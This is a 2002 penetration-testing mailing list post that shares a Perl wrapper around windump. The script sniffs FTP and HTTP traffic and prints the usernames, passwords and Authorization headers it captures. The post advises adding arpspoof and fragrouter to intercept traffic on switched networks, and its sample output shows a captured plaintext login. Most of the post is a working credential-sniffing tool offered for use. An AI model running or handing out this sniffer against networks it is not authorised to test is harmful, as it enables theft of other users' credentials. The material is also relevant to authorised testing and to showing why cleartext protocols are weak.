Penetration Testing mailing list archives
Perl Script wrapper for Windump
From: "Susan Chan Lee" <susan.lee () securityassoc com>
Date: Thu, 28 Feb 16:36:05 2002 +0000
Hi Just thought, this Perl script may be useful to you all. This script is essentially a wrapper around windump and demonstrates the weaknesses of the FTP and HTTP protocols. It will cleanly capture and display all FTP and HTTP usernames and passwords and has been configured for Proxy support (port 8080 and 8088 - modify script for your specific requirements). It is most effective on hubbed networks. To use on switched networks use arpspoof and fragrouter or something similar for best results. Thanks Susan Chan Lee Security Associates - Singapore #!/usr/bin/perl # Author: Susan Lee # email: susan.lee () securityassoc com # File: sort.pl # Usage: perl sort.pl $LIMIT = shift || 25000; $|=1; open (STDIN,"windump -lnx -s 1024 dst port 80 or 8080 or 8088 or 21 |"); while (<>) { if (/^\S/) { last unless $LIMIT--; while ($packet=~/(USER|PASS|GET|POST|WWW-Authenticate|Authorization).+/g) { print "$client -> $host\t$&\n"; } undef $client; undef $host; undef $packet; ($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/ if /P \d+:\d+\((\d+)\)/ && $1 > 0; } next unless $client && $host; s/\s+//; s/([0-9a-f]{2})\s?/chr(hex($1))/eg; tr/\x1F-\x7E\r\n//cd; $packet .= $_; } # End of Script Readme File: Tested successfully using ActiveState Perl (http://www.activestate.com). This script is essentially a wrapper around windump and demonstrates the weaknesses of the FTP and HTTP protocols. It will cleanly capture and display all FTP and HTTP usernames and passwords and has been configured for Proxy support (port 8080 and 8088 - modify script for your specific requirements). It is most effective on hubbed networks. To use on switched networks use arpspoof and fragrouter or something similar for best results. Sort.pl builds on a script written by Lincoln Stein. This script is a port to Windows and makes some other modifications. This script is really a wrap around the Windump program, which needs to installed and configured on your system for this script to work (http://netgroup-serv.polito.it/windump/) sort.pl assumes windump is in your system path. If your system has multiple interfaces (including dial-up interfaces), then youll need to tell windump which interface to listen on via the i X command, where X in the number of the interface and edit the script appropriately (line 8). Use the windump D command to see all interfaces on your system. An example is given below: C:\Temp\ps>perl sort.pl windump: listening on\Device\Packet_{1443C46F-E2B6-404F-9588-BB555B2E3764} 172.1.3.130 -> 172.1.4.231 USER root 172.1.3.130 -> 172.1.4.231 PASS london 172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/ps.gif HTTP/1.1 172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/spacer.gif HTTP/1.1 172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/go.gif HTTP/1.1 172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/search.gif HTTP/1.1 172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/bg_area2.gif HTTP/1.1 172.1.3.130 -> 10.168.13.1 GET http://packetstormsecurity.nl/images/top.gif HTTP/1.1 493 packets received by filter 0 packets dropped by kernel ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Perl Script wrapper for Windump Susan Chan Lee (Feb 28)